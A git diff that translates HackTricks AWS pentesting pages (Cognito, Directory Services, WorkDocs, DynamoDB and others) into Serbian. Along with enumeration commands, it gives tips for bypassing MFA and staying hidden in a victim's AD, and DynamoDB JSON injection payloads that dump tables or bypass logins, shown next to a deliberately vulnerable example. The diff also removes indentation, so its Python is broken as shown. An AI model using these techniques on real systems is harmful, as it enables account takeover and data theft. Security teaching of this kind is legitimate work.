+Ova **metoda će uvek biti validna** (ne može biti onemogućena) ali morate imati validan refresh token.
 ```bash
 aws cognito-idp initiate-auth \
-    --client-id 3ig6h5gjm56p1ljls1prq2miut \
-    --auth-flow REFRESH_TOKEN_AUTH \
-    --region us-east-1 \
-    --auth-parameters 'REFRESH_TOKEN='
+--client-id 3ig6h5gjm56p1ljls1prq2miut \
+--auth-flow REFRESH_TOKEN_AUTH \
+--region us-east-1 \
+--auth-parameters 'REFRESH_TOKEN='
 ```
-
 

 
-Code to refresh
-
+Kod za osvežavanje
 ```python
 import boto3
 import botocore
@@ -414,83 +371,74 @@ token = ''
 boto_client = boto3.client('cognito-idp', region_name='')
 
 def refresh(client_id, refresh_token):
-    try:
-        return boto_client.initiate_auth(
-            ClientId=client_id,
-            AuthFlow='REFRESH_TOKEN_AUTH',
-            AuthParameters={
-                'REFRESH_TOKEN': refresh_token
-            }
-        )
-    except botocore.exceptions.ClientError as e:
-        return e.response
+try:
+return boto_client.initiate_auth(
+ClientId=client_id,
+AuthFlow='REFRESH_TOKEN_AUTH',
+AuthParameters={
+'REFRESH_TOKEN': refresh_token
+}
+)
+except botocore.exceptions.ClientError as e:
+return e.response
 
 
 print(refresh(client_id, token))
 ```
-
 

 
 ### CUSTOM_AUTH
 
-In this case the **authentication** is going to be performed through the **execution of a lambda function**.
+U ovom slučaju, **autentifikacija** će se vršiti kroz **izvršenje lambda funkcije**.
 
-## Extra Security
+## Dodatna sigurnost
 
-### Advanced Security
+### Napredna sigurnost
 
-By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.**
+Podrazumevano je onemogućena, ali ako je omogućena, Cognito bi mogao da **pronađe preuzimanje naloga**. Da biste minimizirali verovatnoću, trebali biste se prijaviti sa **mreže unutar istog grada, koristeći isti korisnički agent** (i IP ako je to moguće)**.**
 
-### **MFA Remember device**
+### **MFA Zapamti uređaj**
 
-If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection.
+Ako se korisnik prijavi sa istog uređaja, MFA može biti zaobiđena, stoga pokušajte da se prijavite iz istog pregledača sa istim metapodacima (IP?) kako biste pokušali da zaobiđete MFA zaštitu.
 
-## User Pool Groups IAM Roles
+## IAM uloge grupa korisničkog bazena
 
-It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\
-Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached.
+Moguće je dodati **korisnike u grupe korisničkog bazena** koje su povezane sa jednom **IAM ulogom**.\
+Štaviše, **korisnici** mogu biti dodeljeni **više od 1 grupi sa različitim IAM ulogama**.
 
-Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool).
+Napomena: čak i ako je grupa unutar grupe sa dodeljenom IAM ulogom, da bi mogli da pristupite IAM kredencijalima te grupe, potrebno je da **Korisnički bazen bude poveren od strane Identitetskog bazena** (i da znate detalje tog Identitetskog bazena).
 
-Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.**
+Još jedan zahtev za dobijanje **IAM uloge navedene u IdToken-u** kada je korisnik autentifikovan u Korisničkom bazenu (`aws cognito-idp initiate-auth...`) je da **provajder autentifikacije identiteta** treba da naznači da **uloga mora biti izabrana iz tokena.**
 
 

 
-The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\
-However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed):
-
+**Uloge** kojima korisnik ima pristup su **unutar `IdToken`**, i korisnik može **izabrati koju ulogu želi za kredencijale** sa **`--custom-role-arn`** iz `aws cognito-identity get-credentials-for-identity`.\
+Međutim, ako je **podrazumevana opcija** ona **konfigurisana** (`koristi podrazumevanu ulogu`), i pokušate da pristupite ulozi iz IdToken-a, dobićete **grešku** (zato je potrebna prethodna konfiguracija):
 ```
 An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN.
 ```
-
 > [!WARNING]
-> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**).
-
+> Imajte na umu da uloga dodeljena **Grupi korisničkih pool-a** mora biti **dostupna od strane Provajdera identiteta** koji **veruje korisničkom pool-u** (jer će **session kredencijali IAM uloge biti dobijeni iz nje**).
 ```json
 {
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Effect": "Allow",
-            "Principal": {
-                "Federated": "cognito-identity.amazonaws.com"
-            },
-            "Action": "sts:AssumeRoleWithWebIdentity",
-            "Condition": {
-                "StringEquals": {
-                    "cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439"
-                },
-                "ForAnyValue:StringLike": {
-                    "cognito-identity.amazonaws.com:amr": "authenticated"
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "cognito-identity.amazonaws.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439"
+},
+"ForAnyValue:StringLike": {
+"cognito-identity.amazonaws.com:amr": "authenticated"
+}
+}
+}
+]
 }js
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
index 2a907b71b..cd3120e33 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -4,30 +4,28 @@
 
 ## DataPipeline
 
-AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed:
+AWS Data Pipeline je dizajniran da olakša **pristup, transformaciju i efikasan prenos** podataka na velikoj skali. Omogućava sledeće operacije:
 
-1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly.
-2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently.
-3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including:
-   - Amazon S3
-   - Amazon RDS
-   - Amazon DynamoDB
-   - Amazon EMR
+1. **Pristupite svojim podacima gde su pohranjeni**: Podaci koji se nalaze u raznim AWS uslugama mogu se neometano pristupiti.
+2. **Transformišite i obrađujte na velikoj skali**: Obimni zadaci obrade i transformacije podataka se efikasno obavljaju.
+3. **Efikasno prenesite rezultate**: Obradni podaci se mogu efikasno preneti na više AWS usluga uključujući:
+- Amazon S3
+- Amazon RDS
+- Amazon DynamoDB
+- Amazon EMR
 
-In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals.
+U suštini, AWS Data Pipeline pojednostavljuje kretanje i obradu podataka između različitih AWS računarskih i skladišnih usluga, kao i lokalnih izvora podataka, u određenim intervalima.
 
 ### Enumeration
-
 ```bash
 aws datapipeline list-pipelines
 aws datapipeline describe-pipelines --pipeline-ids 
 aws datapipeline list-runs --pipeline-id 
 aws datapipeline get-pipeline-definition --pipeline-id 
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse datapipeline permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite dozvole datapipeline-a za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-datapipeline-privesc.md
@@ -35,10 +33,9 @@ In the following page you can check how to **abuse datapipeline permissions to e
 
 ## CodePipeline
 
-AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define.
+AWS CodePipeline je potpuno upravljana **usluga kontinuirane isporuke** koja vam pomaže da **automatizujete svoje procese isporuke** za brza i pouzdana ažuriranja aplikacija i infrastrukture. CodePipeline automatizuje **faze izgradnje, testiranja i implementacije** vašeg procesa isporuke svaki put kada dođe do promene koda, na osnovu modela isporuke koji definišete.
 
 ### Enumeration
-
 ```bash
 aws codepipeline list-pipelines
 aws codepipeline get-pipeline --name 
@@ -47,10 +44,9 @@ aws codepipeline list-pipeline-executions --pipeline-name 
 aws codepipeline list-webhooks
 aws codepipeline get-pipeline-state --name 
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse codepipeline permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite dozvole codepipeline-a za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-codepipeline-privesc.md
@@ -58,12 +54,11 @@ In the following page you can check how to **abuse codepipeline permissions to e
 
 ## CodeCommit
 
-It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud.
+To je **usluga za kontrolu verzija**, koja je hostovana i potpuno upravljana od strane Amazona, a može se koristiti za privatno skladištenje podataka (dokumenata, binarnih fajlova, izvornog koda) i upravljanje njima u oblaku.
 
-It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools.
+Ona **eliminira** potrebu da korisnik zna Git i **upravlja sopstvenim sistemom kontrole verzija** ili brine o skaliranju svoje infrastrukture. Codecommit podržava sve standardne **funkcionalnosti koje se mogu naći u Gitu**, što znači da besprekorno funkcioniše sa trenutnim Git alatima korisnika.
 
 ### Enumeration
-
 ```bash
 # Repos
 aws codecommit list-repositories
@@ -95,13 +90,8 @@ ssh-keygen -f .ssh/id_rsa -l -E md5
 # Clone repo
 git clone ssh://@git-codecommit..amazonaws.com/v1/repos/
 ```
-
 ## References
 
 - [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
index 93992174c..59f1b8065 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
@@ -4,26 +4,25 @@
 
 ## Directory Services
 
-AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud.
+AWS Directory Service for Microsoft Active Directory je upravljana usluga koja olakšava **postavljanje, upravljanje i skaliranje direktorijuma** u AWS Cloud-u. Izgrađena je na stvarnom **Microsoft Active Directory** i čvrsto se integriše s drugim AWS uslugama, olakšavajući upravljanje vašim radnim opterećenjima i AWS resursima koji su svesni direktorijuma. Sa AWS Managed Microsoft AD, možete **koristiti svoje postojeće** Active Directory korisnike, grupe i politike za upravljanje pristupom vašim AWS resursima. Ovo može pomoći u pojednostavljivanju upravljanja identitetom i smanjenju potrebe za dodatnim rešenjima identiteta. AWS Managed Microsoft AD takođe pruža automatske rezervne kopije i mogućnosti oporavka od katastrofa, pomažući da se osigura dostupnost i trajnost vašeg direktorijuma. Sve u svemu, AWS Directory Service for Microsoft Active Directory može vam pomoći da uštedite vreme i resurse pružajući upravljanu, visoko dostupnu i skalabilnu Active Directory uslugu u AWS Cloud-u.
 
 ### Options
 
-Directory Services allows to create 5 types of directories:
+Directory Services omogućava kreiranje 5 tipova direktorijuma:
 
-- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC.
-- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
-- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
-- **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
-- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
+- **AWS Managed Microsoft AD**: Koji će pokrenuti novi **Microsoft AD u AWS-u**. Moći ćete da postavite administratorsku lozinku i pristupite DC-ima u VPC-u.
+- **Simple AD**: Koji će biti **Linux-Samba** server kompatibilan sa Active Directory-jem. Moći ćete da postavite administratorsku lozinku i pristupite DC-ima u VPC-u.
+- **AD Connector**: Proksi za **preusmeravanje zahteva za direktorijumom na vaš postojeći Microsoft Active Directory** bez keširanja bilo kakvih informacija u oblaku. Biće aktivan u **VPC-u** i morate dati **akreditive za pristup postojećem AD-u**.
+- **Amazon Cognito User Pools**: Ovo je isto kao Cognito User Pools.
+- **Cloud Directory**: Ovo je **najjednostavnije**. **Serverless** direktorijum gde označavate **šemu** koja će se koristiti i naplaćujete se **prema korišćenju**.
 
-AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.
+AWS Directory services omogućava **sinhronizaciju** sa vašim postojećim **on-premises** Microsoft AD, **pokretanje vlastitog** u AWS-u ili sinhronizaciju sa **drugim tipovima direktorijuma**.
 
 ### Lab
 
-Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html)
+Ovde možete pronaći lep tutorijal za kreiranje vlastitog Microsoft AD u AWS-u: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html)
 
 ### Enumeration
-
 ```bash
 # Get directories and DCs
 aws ds describe-directories
@@ -36,10 +35,9 @@ aws ds get-directory-limits
 aws ds list-certificates --directory-id 
 aws ds describe-certificate --directory-id  --certificate-id 
 ```
-
 ### Login
 
-Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:**
+Napomena da ako **opis** direktorijuma sadrži **domen** u polju **`AccessUrl`**, to je zato što korisnik verovatno može da se **prijavi** sa svojim **AD akreditivima** u nekim **AWS uslugama:**
 
 - `.awsapps.com/connect` (Amazon Connect)
 - `.awsapps.com/workdocs` (Amazon WorkDocs)
@@ -57,30 +55,29 @@ Note that if the **description** of the directory contained a **domain** in the
 
 ### Using an AD user
 
-An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console.
+**AD korisniku** može biti dodeljen **pristup AWS upravljačkoj konzoli** putem uloge koju treba preuzeti. **Podrazumevano korisničko ime je Admin** i moguće je **promeniti njegovu lozinku** iz AWS konzole.
 
-Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\
-It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth).
+Stoga, moguće je **promeniti lozinku Admin-a**, **napraviti novog korisnika** ili **promeniti lozinku** korisnika i dodeliti toj osobi ulogu kako bi se održao pristup.\
+Takođe je moguće **dodati korisnika u grupu unutar AD** i **dati toj AD grupi pristup ulozi** (da bi se ova postojanost učinila manje uočljivom).
 
 ### Sharing AD (from victim to attacker)
 
-It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\
-However, this implies sharing the managed AD and also creating an VPC peering connection.
+Moguće je deliti AD okruženje od žrtve do napadača. Na ovaj način napadač će moći da nastavi sa pristupom AD okruženju.\
+Međutim, to podrazumeva deljenje upravljanog AD-a i takođe kreiranje VPC peering veze.
 
-You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html)
+Možete pronaći vodič ovde: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html)
 
 ### ~~Sharing AD (from attacker to victim)~~
 
-It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account.
+Ne izgleda da je moguće dodeliti AWS pristup korisnicima iz različitog AD okruženja jednoj AWS nalogu.
 
 ## WorkDocs
 
-Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents.
+Amazon Web Services (AWS) WorkDocs je usluga za **skladištenje i deljenje datoteka** zasnovana na oblaku. Deo je AWS paketa usluga računarstva u oblaku i dizajniran je da pruži sigurno i skalabilno rešenje za organizacije za skladištenje, deljenje i saradnju na datotekama i dokumentima.
 
-AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools.
+AWS WorkDocs pruža web interfejs za korisnike da otpremaju, pristupaju i upravljaju svojim datotekama i dokumentima. Takođe nudi funkcije kao što su kontrola verzija, saradnja u realnom vremenu i integracija sa drugim AWS uslugama i alatima trećih strana.
 
 ### Enumeration
-
 ```bash
 # Get AD users (Admin not included)
 aws workdocs describe-users --organization-id 
@@ -109,7 +106,6 @@ aws workdocs describe-resource-permissions --resource-id 
 aws workdocs add-resource-permissions --resource-id  --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
 ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -117,7 +113,3 @@ aws workdocs add-resource-permissions --resource-id  --principals Id=anonymo
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
index caf35d03c..efb589da2 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
@@ -4,10 +4,9 @@
 
 ## DocumentDB
 
-Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB.
+Amazon DocumentDB, koji nudi kompatibilnost sa MongoDB, predstavlja se kao **brza, pouzdana i potpuno upravljana usluga baze podataka**. Dizajniran za jednostavnost u implementaciji, radu i skalabilnosti, omogućava **besprekornu migraciju i rad MongoDB-kompatibilnih baza podataka u oblaku**. Korisnici mogu iskoristiti ovu uslugu za izvršavanje svog postojećeg aplikacionog koda i korišćenje poznatih drajvera i alata, obezbeđujući glatku tranziciju i rad sličan radu sa MongoDB.
 
 ### Enumeration
-
 ```bash
 aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint"
 aws docdb describe-db-instances #Get hostnames from here
@@ -20,10 +19,9 @@ aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name 
 ```
-
 ### NoSQL Injection
 
-As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks:
+Pošto je DocumentDB kompatibilna sa MongoDB, možete zamisliti da je takođe podložna uobičajenim NoSQL injection napadima:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/nosql-injection
@@ -40,7 +38,3 @@ https://book.hacktricks.xyz/pentesting-web/nosql-injection
 - [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
index cb0864715..b972e3352 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
@@ -4,30 +4,29 @@
 
 ## DynamoDB
 
-### Basic Information
+### Osnovne informacije
 
-Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities.
+Amazon DynamoDB se predstavlja kao **potpuno upravljana, serverless, key-value NoSQL baza podataka**, prilagođena za pokretanje aplikacija visokih performansi bez obzira na njihovu veličinu. Usluga obezbeđuje robusne karakteristike uključujući inherentne mere bezbednosti, neprekidne rezervne kopije, automatsku replikaciju širom više regiona, integrisano keširanje u memoriji i praktične alate za izvoz podataka.
 
-In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization.
+U kontekstu DynamoDB, umesto uspostavljanja tradicionalne baze podataka, **kreiraju se tabele**. Svaka tabela zahteva specifikaciju **ključne particije** kao integralnog dela **primarnog ključa tabele**. Ovaj ključ particije, suštinski **hash vrednost**, igra ključnu ulogu u preuzimanju stavki i distribuciji podataka širom različitih hostova. Ova distribucija je ključna za održavanje i skalabilnosti i dostupnosti baze podataka. Pored toga, postoji opcija za uključivanje **sortnog ključa** kako bi se dodatno poboljšala organizacija podataka.
 
-### Encryption
+### Enkripcija
 
-By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account.
+Podrazumevano, DynamoDB koristi KMS ključ koji \*\*pripada Amazon DynamoDB,\*\* čak ni AWS upravljani ključ koji barem pripada vašem nalogu.
 
 

 
-### Backups & Export to S3
+### Rezervne kopije i izvoz u S3
 
-It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations.
+Moguće je **zakazati** generisanje **rezervnih kopija tabela** ili ih kreirati na **zahtev**. Štaviše, takođe je moguće omogućiti **obnovu u tački vremena (PITR) za tabelu.** Obnova u tački vremena pruža kontinuirane **rezervne kopije** vaših DynamoDB podataka za **35 dana** kako bi vam pomogla da se zaštitite od slučajnih operacija pisanja ili brisanja.
 
-It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**.
+Takođe je moguće izvesti **podatke tabele u S3**, ali tabela mora imati **omogućenu PITR**.
 
 ### GUI
 
-There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin)
-
-### Enumeration
+Postoji GUI za lokalne Dynamo usluge kao što su [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), itd, koji bi mogli biti korisni: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin)
 
+### Enumeracija
 ```bash
 # Tables
 aws dynamodb list-tables
@@ -36,7 +35,7 @@ aws dynamodb describe-table --table-name  #Get metadata info
 
 #Check if point in time recovery is enabled
 aws dynamodb describe-continuous-backups \
-  --table-name tablename
+--table-name tablename
 
 # Backups
 aws dynamodb list-backups
@@ -54,8 +53,7 @@ aws dynamodb describe-export --export-arn 
 # Misc
 aws dynamodb describe-endpoints #Dynamodb endpoints
 ```
-
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
@@ -67,47 +65,45 @@ aws dynamodb describe-endpoints #Dynamodb endpoints
 ../aws-privilege-escalation/aws-dynamodb-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-dynamodb-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Persistencija
 
 {{#ref}}
 ../aws-persistence/aws-dynamodb-persistence.md
 {{#endref}}
 
-## DynamoDB Injection
+## DynamoDB Injekcija
 
-### SQL Injection
+### SQL Injekcija
 
-There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**.
+Postoje načini za pristupanje podacima u DynamoDB koristeći **SQL sintaksu**, stoga su tipične **SQL injekcije takođe moguće**.
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/sql-injection
 {{#endref}}
 
-### NoSQL Injection
+### NoSQL Injekcija
 
-In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\
-You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
+U DynamoDB različite **uslove** je moguće koristiti za preuzimanje podataka, kao u uobičajenoj NoSQL injekciji, ako je moguće **povezati više uslova za preuzimanje** podataka, mogli biste dobiti skrivene podatke (ili izvući celu tabelu).\
+Ovde možete pronaći uslove koje podržava DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
 
-Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**.
+Napomena da se **različiti uslovi** podržavaju ako se podaci pristupaju putem **`query`** ili putem **`scan`**.
 
 > [!NOTE]
-> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited).
-
-If you can **change the comparison** performed or add new ones, you could retrieve more data.
+> U stvari, **Query** akcije moraju da specificiraju **uslov "EQ" (jednako)** u **primarnom** ključu da bi funkcionisale, čineći ih mnogo **manje podložnim NoSQL injekcijama** (i takođe čineći operaciju veoma ograničenom).
 
+Ako možete **promeniti poređenje** koje se vrši ili dodati nova, mogli biste preuzeti više podataka.
 ```bash
 # Comparators to dump the database
 "NE": "a123" #Get everything that doesn't equal "a123"
 "NOT_CONTAINS": "a123" #What you think
 "GT": " " #All strings are greater than a space
 ```
-
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/nosql-injection
 {{#endref}}
@@ -115,68 +111,54 @@ https://book.hacktricks.xyz/pentesting-web/nosql-injection
 ### Raw Json injection
 
 > [!CAUTION]
-> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!**
+> **Ova ranjivost se zasniva na dynamodb Scan Filter koji je sada ukinut!**
 
-**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents.
-
-For example, injecting in a request like:
+**DynamoDB** prihvata **Json** objekte za **pretragu** podataka unutar DB-a. Ako otkrijete da možete pisati u json objekt koji se šalje za pretragu, mogli biste napraviti dump DB-a, svih sadržaja.
 
+Na primer, injektovanje u zahtev kao:
 ```bash
 '{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}'
 ```
-
-an attacker could inject something like:
+napadač bi mogao da ubaci nešto poput:
 
 `1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0`
 
-fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all.
-
-Another **vulnerable example using a login** could be:
+ispravite "EQ" uslov tražeći ID 1000, a zatim tražeći sve podatke sa ID stringom većim od 0, što je sve.
 
+Još jedan **ranjiv primer korišćenja prijave** mogao bi biti:
 ```python
 scan_filter = """{
-    "username": {
-        "ComparisonOperator": "EQ",
-        "AttributeValueList": [{"S": "%s"}]
-    },
-    "password": {
-        "ComparisonOperator": "EQ",
-        "AttributeValueList": [{"S": "%s"}]
-    }
+"username": {
+"ComparisonOperator": "EQ",
+"AttributeValueList": [{"S": "%s"}]
+},
+"password": {
+"ComparisonOperator": "EQ",
+"AttributeValueList": [{"S": "%s"}]
+}
 }
 """ % (user_data['username'], user_data['password'])
 
 dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter))
 ```
-
-This would be vulnerable to:
-
+Ovo bi bilo ranjivo na:
 ```
 username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
